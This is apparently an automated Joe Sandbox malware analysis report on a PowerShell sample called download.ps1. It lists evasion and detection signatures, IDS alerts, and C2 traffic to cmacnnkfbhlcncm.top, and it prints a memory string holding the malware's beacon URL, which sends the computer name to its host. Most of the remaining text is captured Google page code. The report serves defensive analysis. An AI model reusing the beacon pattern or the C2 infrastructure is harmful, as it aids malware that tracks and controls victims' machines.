Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1579458
MD5:e8dd1c8a9dc723dd3efb012b52d487a8
SHA1:1d59b6fda15b8d29ddf665b5fc4abf715b6f0186
SHA256:96d6d2f4e613ae1d987e3f1eb72237fa1308e336e06cffdd865f0a124346a474
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Loading BitLocker PowerShell Module
Queries Google from non browser process on port 80
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • powershell.exe (PID: 5540 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5540, ProcessName: powershell.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 5540, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-12-22T13:42:09.949431+010028593911Domain Observed Used for C2 Detected192.168.2.5618831.1.1.153UDP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: download.ps1Virustotal: Detection: 13%Perma Link
Source: download.ps1ReversingLabs: Detection: 15%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 85.1% probability
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2208726601.00000197B6232000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.2245289656.00000197D0625000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2245289656.00000197D0672000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdbt source: powershell.exe, 00000000.00000002.2209370922.00000197B8156000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 source: powershell.exe, 00000000.00000002.2208726601.00000197B6232000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.2208726601.00000197B6232000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: tion.pdbes]p8 source: powershell.exe, 00000000.00000002.2209370922.00000197B80C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.2209370922.00000197B80EE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbK source: powershell.exe, 00000000.00000002.2245289656.00000197D0672000.00000004.00000020.00020000.00000000.sdmp

Networking

barindex
Source: Network trafficSuricata IDS: 2859391 - Severity 1 - ETPRO MALWARE TA582 Domain in DNS Lookup : 192.168.2.5:61883 -> 1.1.1.1:53
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeHTTP traffic: GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.google.com Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 45.61.136.138 45.61.136.138
Source: global trafficHTTP traffic detected: GET /cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: cmacnnkfbhlcncm.topConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: www.google.comConnection: Keep-Alive
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: *href=https://www.youtube.com/?tab=w1><spanX equals www.youtube.com (Youtube)
Source: global trafficDNS traffic detected: DNS query: cmacnnkfbhlcncm.top
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: powershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://$o91mkbr7ed3vtf6/$32nxepuvb0gay75.php?id=$env:computername&key=$xcdjnwvua&s=527
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://0.google.com/
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9696000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9696000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cmacnnkfbhlcncm.top/cbym9z28drhtr.php?id=user-PC&key=95448541662&s=527
Source: powershell.exe, 00000000.00000002.2209370922.00000197B8156000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mE
Source: powershell.exe, 00000000.00000002.2243637485.00000197D03C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
Source: powershell.exe, 00000000.00000002.2243637485.00000197D03C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://maps.google.com/maps?hl=en&tab=wl
Source: powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPage
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schema.org/WebPageX
Source: powershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000000.00000002.2209597536.00000197B81D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.blogger.com/?tab=wj
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/history/optout?hl=en
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/mobile/?hl=en&tab=wD
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.google.com/preferences?hl=enX
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://0.google.com/
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/ServiceLogin?hl=en&passive=true&continue=http://www.google.com/&ec=GAZAA
Source: powershell.exe, 00000000.00000002.2209597536.00000197B81D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000000.00000002.2235325470.00000197C83F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C81D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9C3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://books.google.com/?hl=en&tab=wp
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://calendar.google.com/calendar?tab=wc
Source: powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000000.00000002.2235325470.00000197C83F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://csp.withgoogle.com/csp/gws/other-hp
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/?usp=docs_alc
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/?tab=wo
Source: powershell.exe, 00000000.00000002.2209597536.00000197B83F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s24X
Source: powershell.exe, 00000000.00000002.2235325470.00000197C83F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C81D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lh3.googleusercontent.com/ogw/default-user=s96X
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/?tab=wm
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://news.google.com/?tab=wn
Source: powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.google.com/?tab=wq&pageId=none
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://play.google.com/?hl=en&tab=w8
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9B57000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com/gb/images/b_8d5afc09.png);_background:url(https://ssl.gstatic.com/gb/images/
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/?hl=en&tab=wT
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/finance?tab=we
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&tab=wi
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=whX
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doo
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/rise-of-the-half-moon-december-6753651837110600-2xa.gif
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/logos/doodles/2024/rise-of-the-half-moon-december-6753651837110600-2xa.gifX
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/shopping?hl=en&source=og&tab=wf
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/webhp?tab=ww
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9C3E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9C3E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.comX
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?tab=w1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F48E320_2_00007FF848F48E32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 0_2_00007FF848F480860_2_00007FF848F48086
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: gQjA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="0RrWT6XWw1bQkowfq3gQjA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="0RrWT6XWw1bQkowfq3gQjA">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfgX
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d'
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0
Source: powershell.exe, 00000000.00000002.2209597536.00000197B9C3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basecomb:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0X
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.2209597536.00000197BA16E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.2235325470.00000197C83F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C81D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2235325470.00000197C8240000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.2209597536.00000197B9A46000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: else top.location='/doodles/';};})();</script><input value="AL9hbdgAAAAAZ2gXNZig8-3axEixtEUj22vbavXghlto" name="iflsig" type="hidden"></span></span></td><td class="fl sblc" align="left" nowrap="" width="25%"><a href="/advanced_search?hl=en&amp;authuser=0">Advanced search</a></td></tr></table><input id="gbv" name="gbv" type="hidden" value="1"><script nonce="0RrWT6XWw1bQkowfq3gQjA">(function(){var a,b="1";if(document&&document.getElementById)if(typeof XMLHttpRequest!="undefined")b="2";else if(typeof ActiveXObject!="undefined"){var c,d,e=["MSXML2.XMLHTTP.6.0","MSXML2.XMLHTTP.3.0","MSXML2.XMLHTTP","Microsoft.XMLHTTP"];for(c=0;d=e[c++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if(a=="2"&&location.search.indexOf("&gbv=2")==-1){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div style="font-size:83%;min-height:3.5em"><br></div><span id="footer"><div style="font-size:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">Advertising</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a></div></div><p style="font-size:8pt;color:#70757a">&copy; 2024 - <a href="/intl/en/policies/privacy/">Privacy</a> - <a href="/intl/en/policies/terms/">Terms</a></p></span></center><script nonce="0RrWT6XWw1bQkowfq3gQjA">(function(){window.google.cdo={height:757,width:1440};(function(){var a=window.innerWidth,b=window.innerHeight;if(!a||!b){var c=window.document,d=c.compatMode=="CSS1Compat"?c.documentElement:c.body;a=d.clientWidth;b=d.clientHeight}if(a&&b&&(a!=google.cdo.width||b!=google.cdo.height)){var e=google,f=e.log,g="/client_204?&atyp=i&biw="+a+"&bih="+b+"&ei="+google.kEI,h="",k=window.google&&window.google.kOPI||null;k&&(h+="&opi="+k);f.call(e,"","",g+h)};}).call(this);})();</script> <script nonce="0RrWT6XWw1bQkowfq3gQjA">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="0RrWT6XWw1bQkowfq3gQjA">(function(){var 